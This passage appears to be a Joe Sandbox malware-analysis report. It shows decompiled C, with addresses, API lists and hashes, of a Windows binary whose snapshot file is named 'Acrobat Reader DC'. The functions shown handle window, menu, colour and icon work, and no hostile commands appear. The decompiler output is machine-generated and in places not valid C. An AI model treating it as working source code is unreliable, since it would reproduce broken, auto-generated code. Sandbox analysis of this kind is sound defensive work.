                                  							}
                                  							if((_t179 & 0x00000040) != 0) {
                                  								_t201 = 0xc0;
                                  								EnableWindow(_t226, 1);
                                  								_t179 = _v132;
                                  							}
                                  							_t221 = _t179 & 0x00000020;
                                  							if(_t221 != 0) {
                                  								_t201 = _t201 + 0x30;
                                  							}
                                  							_t212 = _t179 & 0x00000010;
                                  							_v132 = _t212;
                                  							if(_t212 != 0) {
                                  								_t201 = _t201 + 0x30;
                                  							}
                                  							if((_t179 & 0x00000008) != 0) {
                                  								_t201 = _t201 + 0x1008;
                                  							}
                                  							if((_t179 & 0x00001000) != 0) {
                                  								_t201 = _t201 + 0x1008;
                                  							}
                                  							_t181 =  *((intOrPtr*)(_t229 + 0x8b));
                                  							 *(_t229 + 0x8a) =  !_t201 &  *(_t229 + 0x8a) | _t179;
                                  							if(_t181 == 0xff) {
                                  								L78:
                                  								if(_t221 != 0) {
                                  									ShowWindow(_t226, 0);
                                  								}
                                  								if(_v132 != 0) {
                                  									ShowWindow(_t226, 4);
                                  									if(_v133 == 0x1a && ( *(_t229 + 0x8a) & 0x00000040) != 0) {
                                  										EnableWindow(_t226, 1);
                                  									}
                                  								}
                                  								E00430B87(_v124, _t229, 1);
                                  							} else {
                                  								_t215 = _v124[0x65];
                                  								if((_t181 & 0x000000ff) == _t215 || _t215 == 0xffffffff) {
                                  									goto L78;
                                  								}
                                  							}
                                  						}
                                  						goto L85;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t178 + 0x448d50) & 0x000000ff) * 4 +  &M00448D24))) {
                                  							case 0:
                                  								__eax = __ebx & 0x00000007;
                                  								if(__eax == 0) {
                                  									__ecx = _v128;
                                  									_push(0);
                                  									_push(0);
                                  									_push(0x466);
                                  									_push(_v128);
                                  									goto L60;
                                  								} else {
                                  									if(__eax == 0) {
                                  										__eax = _v128;
                                  										_push(0xffff0000);
                                  										_push(0xffffffff);
                                  										_push(0x465);
                                  										_push(_v128);
                                  										L60:
                                  										if(SendMessageW() != 0) {
                                  											goto L61;
                                  										}
                                  									} else {
                                  										__edx = _v128;
                                  										__eax = SendMessageW(_v128, 0x467, 0, 0);
                                  										goto L61;
                                  									}
                                  								}
                                  								goto L62;
                                  							case 1:
                                  								if((__bl & 0x00000010) != 0) {
                                  									__ecx = _v124;
                                  									__eax =  *(__esi + 0x8b) & 0x000000ff;
                                  									if( *((char*)(__ecx + 0x19c)) != 0) {
                                  										__edx =  *(__ecx + 0x198);
                                  										 *(__ecx + 0x194) =  *(__ecx + 0x198);
                                  									}
                                  									__edi = __ecx;
                                  									__eax =  *(__esi + 0x8b) & 0x000000ff;
                                  									 *(__edi + 0x198) =  *(__esi + 0x8b) & 0x000000ff;
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 2:
                                  								goto L1;
                                  							case 3:
                                  								__ecx =  *(__esi + 8);
                                  								__eax =  &_v116;
                                  								_v140 = 0;
                                  								_v116 = 0x30;
                                  								_v112 = 1;
                                  								if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) == 0 || (__bl & 0x00000020) != 0) {
                                  									goto L1;
                                  								} else {
                                  									if(__bl < 0) {
                                  										_v140 = 3;
                                  									}
                                  									if((__bl & 0x00000001) != 0) {
                                  										_v140 = _v140 | 0x00000008;
                                  									}
                                  									if(_v132 != 0) {
                                  										_v140 = _v140 | 0x00000080;
                                  									}
                                  									if((_v104 & 0x00000008) != 0 && (__bl & 0x00000004) == 0) {
                                  										_v140 = _v140 | 0x00000008;
                                  									}
                                  									__ecx =  *(__esi + 8);
                                  									__edx = _v140;
                                  									__eax =  &_v116;
                                  									_v104 = _v140;
                                  									__eax = SetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116);
                                  									if((__ebx & 0x00000200) == 0) {
                                  										__ecx =  *(__esi + 8);
                                  										__eax =  &_v116;
                                  										if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) != 0 && (_v104 & 0x00001000) != 0) {
                                  											_push(0);
                                  											_push(0xffffffff);
                                  											goto L51;
                                  										}
                                  									} else {
                                  										_push(0);
                                  										_push(__edi);
                                  										L51:
                                  										__edx =  *(__esi + 8);
                                  										__eax = SetMenuDefaultItem( *(__esi + 8), ??, ??);
                                  									}
                                  									__eax = _v124;
                                  									__ecx =  *_v124;
                                  									__eax = DrawMenuBar( *_v124);
                                  									goto L61;
                                  								}
                                  								goto L97;
                                  							case 4:
                                  								__ecx =  *(__esi + 0x30);
                                  								__eax = GetWindowLongW( *(__esi + 0x30), 0xfffffff0);
                                  								__edx =  *(__esi + 0xc);
                                  								__bl = __bl & 0x00000001;
                                  								__bl & 0x00000001 =  ~(__bl & 0x00000001);
                                  								asm("sbb eax, eax");
                                  								__eax =  ~(__bl & 0x00000001) & 0x00001000;
                                  								__eax = ( ~(__bl & 0x00000001) & 0x00001000) + 0x1000;
                                  								_v64 =  *(__esi + 0xc);
                                  								_v68 = 8;
                                  								_v56 = 0xf010;
                                  								_v60 = __eax;
                                  								if((__ebx & 0x00000200) != 0) {
                                  									_v60 = __eax;
                                  								}
                                  								__edx =  *(__esi + 0x30);
                                  								__edi = SendMessageW;
                                  								__ecx =  &_v68;
                                  								__eax = SendMessageW( *(__esi + 0x30), 0x113f, 0,  &_v68);
                                  								if((__ebx & 0x00000400) != 0) {
                                  									__eax =  *(__esi + 0xc);
                                  									__ecx =  *(__esi + 0x30);
                                  									__eax = SendMessageW( *(__esi + 0x30), 0x1102, 2,  *(__esi + 0xc));
                                  								}
                                  								if(_v132 != 0) {
                                  									__edx =  *(__esi + 0x30);
                                  									E00441B7C(0x4a8630,  *(__esi + 0x30)) = _v128;
                                  									__eax = E004415D1(_v128, _v128);
                                  									__ecx =  *(__esi + 0xc);
                                  									__edx =  *(__esi + 0x30);
                                  									__eax = SendMessageW( *(__esi + 0x30), 0x110b, 9,  *(__esi + 0xc));
                                  								}
                                  								goto L61;
                                  							case 5:
                                  								__esi =  *(__esi + 0x30);
                                  								__edx =  &_v28;
                                  								_v140 = 0;
                                  								_v28 = 1;
                                  								_v20 = __edi;
                                  								__edi = SendMessageW(__esi, 0x1053, 0xffffffff,  &_v28);
                                  								if(__edi == 0xffffffff) {
                                  									goto L1;
                                  								} else {
                                  									_v112 = __edi;
                                  									_v108 = 0;
                                  									_v116 = 8;
                                  									__eax = GetWindowLongW(__esi, 0xffffffec);
                                  									if((__al & 0x00000004) != 0 && (__bl & 0x00000005) != 0) {
                                  										__ebx - 1 =  ~(__ebx - 1);
                                  										__ecx =  &_v116;
                                  										asm("sbb eax, eax");
                                  										 ~(__ebx - 1) & 0xfffff000 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
                                  										_v100 = 0xf000;
                                  										_v104 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
                                  										_v140 = SendMessageW(__esi, 0x104c, 0,  &_v116);
                                  									}
                                  									if((__ebx & 0x00002100) == 0) {
                                  										L85:
                                  										return _v140;
                                  									} else {
                                  										if(_v132 != 0) {
                                  											_v104 = 0xffffffff;
                                  										}
                                  										if((__ebx & 0x00002000) != 0) {
                                  											_v104 = 0;
                                  										}
                                  										__edx =  &_v116;
                                  										_v100 = 3;
                                  										__eax = SendMessageW(__esi, 0x102b, __edi,  &_v116);
                                  										_pop(__edi);
                                  										_pop(__esi);
                                  										_pop(__ebx);
                                  										return __eax;
                                  									}
                                  								}
                                  								goto L97;
                                  							case 6:
                                  								__eax = 3;
                                  								if( *0x4a86b4 >= 3) {
                                  									do {
                                  										__ecx =  *0x4a86a4;
                                  										__ecx =  *( *0x4a86a4 + __eax * 4);
                                  										if( *__ecx == 0) {
                                  											goto L20;
                                  										} else {
                                  											__ecx =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											__edi = _v124;
                                  											if( *(__ecx + 4) != _v124[1] ||  *((char*)(__ecx + 0x88)) != 3 || __ecx !=  *(__esi + 0x30)) {
                                  												goto L20;
                                  											} else {
                                  												__cl =  *((intOrPtr*)(__esi + 0x8a));
                                  												if((__bl & __cl) == 0 && (__cl & 0x00000010) != 0) {
                                  													__edx =  *0x4a86a4;
                                  													__eax =  *( *0x4a86a4 + __eax * 4);
                                  													__eax =  *__eax;
                                  													__ecx =  *(__eax + 0x86);
                                  													__edx =  *(__eax + 0x84);
                                  													__ecx =  *((short*)(__eax + 0x82));
                                  													__edx =  *((short*)(__eax + 0x80));
                                  													__eax = MoveWindow(__eax, __edx, __ecx,  *(__eax + 0x84),  *(__eax + 0x86), 0);
                                  													__ecx =  *(__esi + 0x30);
                                  													__edx = _v128;
                                  													__eax = SendMessageW(_v128, 0x469,  *(__esi + 0x30), 0);
                                  												}
                                  											}
                                  										}
                                  										goto L62;
                                  										L20:
                                  										__eax = __eax + 1;
                                  									} while (__eax <=  *0x4a86b4);
                                  								}
                                  								goto L62;
                                  							case 7:
                                  								if((__ebx & 0x00000200) != 0) {
                                  									__edx = _v124;
                                  									 *_v124 = SendMessageW( *_v124, 0x401, __edi, 0);
                                  									if(GetFocus() == __esi->i) {
                                  										__ecx = _v120;
                                  										__eax = E004415D1(_v120, __edi);
                                  									}
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 8:
                                  								__eax = __ebx;
                                  								__eax = __ebx & 0x00000007;
                                  								if(__eax != 0) {
                                  									__edx = _v128;
                                  									__eax = SendMessageW(_v128, 0xf1, __eax, 0);
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 9:
                                  								_t190 = _t198 & 0x00000007;
                                  								if((_t198 & 0x00000007) != 0) {
                                  									E00440D98(_t224, _t190 & 0x00000003);
                                  									L61:
                                  									_v140 = 1;
                                  								}
                                  								goto L62;
                                  							case 0xa:
                                  								goto L62;
                                  						}
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  				L97:
                                  			}

                                  0x00448908
                                  0x00448915
                                  0x0044891c
                                  0x00000000
                                  0x0044891c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004489dd
                                  0x004489e0
                                  0x004489e9
                                  0x004489f1
                                  0x004489f9
                                  0x00448a09
                                  0x00000000
                                  0x00448a18
                                  0x00448a1a
                                  0x00448a1c
                                  0x00448a1c
                                  0x00448a27
                                  0x00448a29
                                  0x00448a29
                                  0x00448a33
                                  0x00448a35
                                  0x00448a35
                                  0x00448a42
                                  0x00448a49
                                  0x00448a49
                                  0x00448a4e
                                  0x00448a51
                                  0x00448a55
                                  0x00448a5e
                                  0x00448a62
                                  0x00448a6e
                                  0x00448a75
                                  0x00448a78
                                  0x00448a89
                                  0x00448a95
                                  0x00448a97
                                  0x00000000
                                  0x00448a97
                                  0x00448a70
                                  0x00448a70
                                  0x00448a72
                                  0x00448a99
                                  0x00448a99
                                  0x00448a9d
                                  0x00448a9d
                                  0x00448aa3
                                  0x00448aa7
                                  0x00448aaa
                                  0x00000000
                                  0x00448aaa
                                  0x00000000
                                  0x00000000
                                  0x00448927
                                  0x0044892d
                                  0x00448933
                                  0x00448938
                                  0x0044893d
                                  0x0044893f
                                  0x00448941
                                  0x00448946
                                  0x0044894b
                                  0x0044894f
                                  0x00448957
                                  0x0044895f
                                  0x00448969
                                  0x0044896e
                                  0x0044896e
                                  0x00448972
                                  0x00448975
                                  0x0044897b
                                  0x00448988
                                  0x00448990
                                  0x00448992
                                  0x00448995
                                  0x004489a1
                                  0x004489a1
                                  0x004489a8
                                  0x004489ae
                                  0x004489bd
                                  0x004489c2
                                  0x004489c7
                                  0x004489ca
                                  0x004489d6
                                  0x004489d6
                                  0x00000000
                                  0x00000000
                                  0x00448c3c
                                  0x00448c3f
                                  0x00448c4f
                                  0x00448c57
                                  0x00448c62
                                  0x00448c6f
                                  0x00448c74
                                  0x00000000
                                  0x00448c7a
                                  0x00448c7d
                                  0x00448c81
                                  0x00448c89
                                  0x00448c91
                                  0x00448c99
                                  0x00448ca3
                                  0x00448ca5
                                  0x00448caa
                                  0x00448cb8
                                  0x00448cbe
                                  0x00448cc6
                                  0x00448cd0
                                  0x00448cd0
                                  0x00448cda
                                  0x00448c1c
                                  0x00448c26
                                  0x00448ce0
                                  0x00448ce5
                                  0x00448ce7
                                  0x00448ce7
                                  0x00448cf5
                                  0x00448cf7
                                  0x00448cf7
                                  0x00448cff
                                  0x00448d0b
                                  0x00448d13
                                  0x00448d19
                                  0x00448d1a
                                  0x00448d1b
                                  0x00448d1f
                                  0x00448d1f
                                  0x00448cda
                                  0x00000000
                                  0x00000000
                                  0x0044882a
                                  0x00448835
                                  0x0044883c
                                  0x0044883c
                                  0x00448842
                                  0x00448848
                                  0x00000000
                                  0x0044884a
                                  0x0044884a
                                  0x0044884c
                                  0x0044884f
                                  0x00448856
                                  0x00000000
                                  0x00448876
                                  0x00448876
                                  0x0044887e
                                  0x0044888d
                                  0x00448893
                                  0x00448896
                                  0x00448898
                                  0x0044889f
                                  0x004488a9
                                  0x004488b1
                                  0x004488bd
                                  0x004488c3
                                  0x004488c6
                                  0x004488d3
                                  0x004488d3
                                  0x0044887e
                                  0x00448856
                                  0x00000000
                                  0x00448868
                                  0x00448868
                                  0x00448869
                                  0x00448871
                                  0x00000000
                                  0x00000000
                                  0x00448ab8
                                  0x00448aba
                                  0x00448ac9
                                  0x00448ad7
                                  0x00448ad9
                                  0x00448adf
                                  0x00448adf
                                  0x00000000
                                  0x00448ad7
                                  0x00000000
                                  0x00000000
                                  0x00448804
                                  0x00448806
                                  0x00448809
                                  0x0044880f
                                  0x0044881f
                                  0x00000000
                                  0x0044881f
                                  0x00000000
                                  0x00000000
                                  0x004487ec
                                  0x004487ef
                                  0x004487fa
                                  0x00448b28
                                  0x00448b28
                                  0x00448b28
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004487e3
                                  0x0044873a
                                  0x0044873a
                                  0x00448742
                                  0x00448742
                                  0x00000000

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044A032(signed int _a4, char _a7, struct HDC__* _a8, struct HDC__* _a12) {
                                  				int _v16;
                                  				void* _v20;
                                  				intOrPtr _t44;
                                  				long _t48;
                                  				long _t52;
                                  				long _t53;
                                  				struct HWND__* _t58;
                                  				intOrPtr _t78;
                                  				struct HDC__* _t79;
                                  				signed int _t94;
                                  				struct HWND__** _t95;
                                  				long _t96;
                                  				long _t97;
                                  
                                  				_t44 =  *0x4a8690; // 0x0
                                  				_t80 = _a4;
                                  				_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
                                  				_t94 = E00441B7C(0x4a8630, _a12);
                                  				_a7 = 0;
                                  				_t97 = GetSysColor(0xf);
                                  				_t48 =  *(_t78 + 0x4c);
                                  				if(_t48 != 0xffffffff) {
                                  					_t97 = _t48;
                                  				}
                                  				if(_t94 == 0xffffffff) {
                                  					L33:
                                  					SetBkColor(_a8, _t97);
                                  					return E00441432(_t80, __eflags, _t97, 0);
                                  				} else {
                                  					_t80 =  *0x4a86a4; // 0xa71980
                                  					_t95 =  *( *(_t80 + _t94 * 4));
                                  					_t52 = _t95[0x11];
                                  					if(_t52 < 0 || _t95[0x22] == 0x1b) {
                                  						_t80 = _t95[0x22] & 0x000000ff;
                                  						__eflags = _t80 - 0x1b;
                                  						if(__eflags > 0) {
                                  							L16:
                                  							__eflags = _t52 - 0xfffffffe;
                                  							_t29 =  &_a7;
                                  							 *_t29 = _t52 == 0xfffffffe;
                                  							__eflags =  *_t29;
                                  							goto L17;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t80 * 4 +  &M0044A29A))) {
                                  								case 0:
                                  									__eflags = GetWindowLongW( *__edi, 0xfffffff0) & 0x08000800;
                                  									if(__eflags == 0) {
                                  										goto L14;
                                  									} else {
                                  										__eax = GetSysColor(0xf);
                                  									}
                                  									goto L17;
                                  								case 1:
                                  									L14:
                                  									_t97 = GetSysColor(5);
                                  									goto L17;
                                  								case 2:
                                  									goto L16;
                                  								case 3:
                                  									_a7 = 1;
                                  									goto L17;
                                  								case 4:
                                  									__eflags = _t95[0x22] - 0xff;
                                  									if(__eflags != 0) {
                                  										GetClientRect( *(_t78 + 0x18c),  &_v20);
                                  										SendMessageW( *(_t78 + 0x18c), 0x1328, 0,  &_v20);
                                  										_t72 = GetWindowDC( *(_t78 + 0x18c));
                                  										_a12 = _t72;
                                  										_t73 = GetPixel(_t72, _v20, _v16);
                                  										_t80 =  *(_t78 + 0x18c);
                                  										_t97 = _t73;
                                  										ReleaseDC( *(_t78 + 0x18c), _a12);
                                  										__eflags = _t97 - 0xffffffff;
                                  										if(__eflags == 0) {
                                  											__eflags =  *0x49751c;
                                  											if(__eflags != 0) {
                                  												goto L14;
                                  											} else {
                                  												_t97 = GetSysColor(0xf);
                                  											}
                                  										}
                                  										goto L17;
                                  									}
                                  									goto L31;
                                  								case 5:
                                  									goto L17;
                                  							}
                                  						}
                                  					} else {
                                  						_t97 = _t52;
                                  						L17:
                                  						if(_t95[0x22] != 0xff && _t95[0x11] == 0xffffffff) {
                                  							_t58 = _t95[0x22];
                                  							if(_t58 == 0x17) {
                                  								L30:
                                  								_a7 = 1;
                                  							} else {
                                  								if(_t58 != 7 && _t58 != 1 && _t58 != 2 && _t58 != 3 && _t58 != 0) {
                                  									_t79 = GetWindowDC( *_t95);
                                  									_t97 = GetPixel(_t79, 0, 0);
                                  									if(_t97 == 0xffffffff) {
                                  										_t80 = _t95[0x21] - 1;
                                  										_t97 = GetPixel(_t79, _t95[0x21] - 1, 0);
                                  										if(_t97 == 0xffffffff) {
                                  											_t97 = GetPixel(_t79, 0, _t95[0x21] - 1);
                                  											if(_t97 == 0xffffffff) {
                                  												_t80 = _t95[0x21] - 1;
                                  												_t97 = GetPixel(_t79, _t95[0x21] - 1, _t95[0x21] - 1);
                                  											}
                                  										}
                                  									}
                                  									ReleaseDC( *_t95, _t79);
                                  									if(_t97 == 0xffffffff) {
                                  										goto L30;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  					L31:
                                  					_t96 = _t95[0x12];
                                  					if(_t96 == 0xffffffff) {
                                  						_t53 = GetSysColor(8);
                                  						_t80 = _a8;
                                  						SetTextColor(_a8, _t53);
                                  					} else {
                                  						SetTextColor(_a8, _t96);
                                  					}
                                  					if(_a7 == 0) {
                                  						goto L33;
                                  					} else {
                                  						SetBkMode(_a8, 1);
                                  						return GetStockObject(5);
                                  					}
                                  				}
                                  			}

















                                  APIs
                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                  • GetClientRect.USER32 ref: 0044A0D1
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                  • ReleaseDC.USER32 ref: 0044A11B
                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                  • ReleaseDC.USER32 ref: 0044A229
                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                  • String ID:
                                  • API String ID: 1744303182-0
                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004341E6(intOrPtr _a4, int _a8, short* _a12, long _a16) {
                                  				void* __edi;
                                  				long _t9;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t12;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t14;
                                  				char* _t24;
                                  				short* _t25;
                                  
                                  				_t25 = _a12;
                                  				_t9 = 0;
                                  				_t24 = _a16;
                                  				 *_t24 = 0;
                                  				_a16 = 0;
                                  				if( *_t25 == 0) {
                                  					L13:
                                  					return _t9;
                                  				} else {
                                  					if(E004114AB(_t24, _t25, L"blank") != 0) {
                                  						_t11 = E004114AB(_t24, _t25, L"info");
                                  						if(_t11 == 0) {
                                  							return LoadIconW(_t11, 0x7f04);
                                  						}
                                  						_t12 = E004114AB(_t24, _t25, L"question");
                                  						if(_t12 != 0) {
                                  							_t13 = E004114AB(_t24, _t25, L"stop");
                                  							if(_t13 != 0) {
                                  								_t14 = E004114AB(_t24, _t25, L"warning");
                                  								if(_t14 != 0) {
                                  									ExtractIconExW(_t25, _a8, 0,  &_a16, 1);
                                  									_t9 = _a16;
                                  									if(_t9 == 0) {
                                  										goto L13;
                                  									} else {
                                  										 *_t24 = 1;
                                  										return _t9;
                                  									}
                                  								} else {
                                  									return LoadIconW(_t14, 0x7f03);
                                  								}
                                  							} else {
                                  								return LoadIconW(_t13, 0x7f01);
                                  							}
                                  						} else {
                                  							return LoadIconW(_t12, 0x7f02);
                                  						}
                                  					} else {
                                  						return  *((intOrPtr*)(_a4 + 0x1b0));
                                  					}
                                  				}
                                  			}












                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004720DB(void* __eflags, void* __fp0, long _a4, struct HDC__* _a8, char _a12) {
                                  				signed int _v6;
                                  				struct _SYSTEMTIME* _v8;
                                  				struct HWND__* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v28;
                                  				char _v36;
                                  				struct tagRECT _v52;
                                  				signed int _v56;
                                  				char _v68;
                                  				char _v100;
                                  				char _v626;
                                  				short _v628;
                                  				char _v644;
                                  				char _v660;
                                  				char _v676;
                                  				char _v684;
                                  				char _v700;
                                  				char _v708;
                                  				char _v716;
                                  				char _v732;
                                  				char _v740;
                                  				char _v748;
                                  				char _v756;
                                  				char _v772;
                                  				char _v780;
                                  				short _v800;
                                  				char _v1330;
                                  				char _v1332;
                                  				signed int __ebx;
                                  				struct HWND__* __edi;
                                  				signed int __esi;
                                  				void* _t195;
                                  				struct HDC__* _t215;
                                  				signed int _t229;
                                  				void* _t233;
                                  				void* _t235;
                                  				void* _t241;
                                  
                                  				_t241 = __fp0;
                                  				_t215 = _a8;
                                  				_v628 = 0;
                                  				E00412F40( &_v626, 0, 0x208);
                                  				_v1332 = 0;
                                  				E00412F40( &_v1330, 0, 0x208);
                                  				_t235 = _t233 + 0x18;
                                  				_t229 = 0;
                                  				_v8 = _a12;
                                  				while(1) {
                                  					_t195 = E0041313C( *((intOrPtr*)(0x491770 + _t229 * 4)), _v8);
                                  					_t235 = _t235 + 8;
                                  					if(_t195 == 0) {
                                  						break;
                                  					}
                                  					_t229 = _t229 + 1;
                                  					if(_t229 < 0x60) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				_t239 = _t229 - 0x60;
                                  				if(_t229 != 0x60) {
                                  					__eflags = _t229 - 0x5f;
                                  					if(__eflags > 0) {
                                  						L144:
                                  						E00402250( &_a12);
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t229 * 4 +  &M00472DC7))) {
                                  							case 0:
                                  								__ecx =  *__esi;
                                  								__edx =  *( *__esi + 4);
                                  								__eax =  *( *__esi + 4) + __esi + 4;
                                  								__edi =  *(E00403CC0( *( *__esi + 4) + __esi + 4) + 0x14);
                                  								__esi = __ebx;
                                  								__eax = E00408F40(__edi, __ebx);
                                  								 *__ebx = __edi;
                                  								goto L143;
                                  							case 1:
                                  								__eax =  *__esi;
                                  								__ecx =  *( *__esi + 4);
                                  								__eax = __ecx + __esi + 4;
                                  								E00403CC0(__ecx + __esi + 4) = __eax + 0x20;
                                  								__eax = E00408E80(__ebx, __ecx, __eax);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 2:
                                  								__edx =  &_v20;
                                  								GetLocalTime(__edx);
                                  								__eax = _v6 & 0x0000ffff;
                                  								_push(_v6 & 0x0000ffff);
                                  								_push(L"%.3d");
                                  								__ecx =  &_v628;
                                  								_push( &_v628);
                                  								goto L16;
                                  							case 3:
                                  								__edx =  &_v644;
                                  								 &_v684 = E00441E23( &_v644,  &_v684);
                                  								__edi = __eax;
                                  								__esi = __ebx;
                                  								__eax = E0040E6A0(__ecx, __eax, __ebx);
                                  								__ecx =  &_v644;
                                  								__eax = E00402250( &_v644);
                                  								__ecx =  &_a12;
                                  								E00402250( &_a12) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  								goto L145;
                                  							case 4:
                                  								_t44 =  &_v772; // 0x48beb0
                                  								__ecx = _t44;
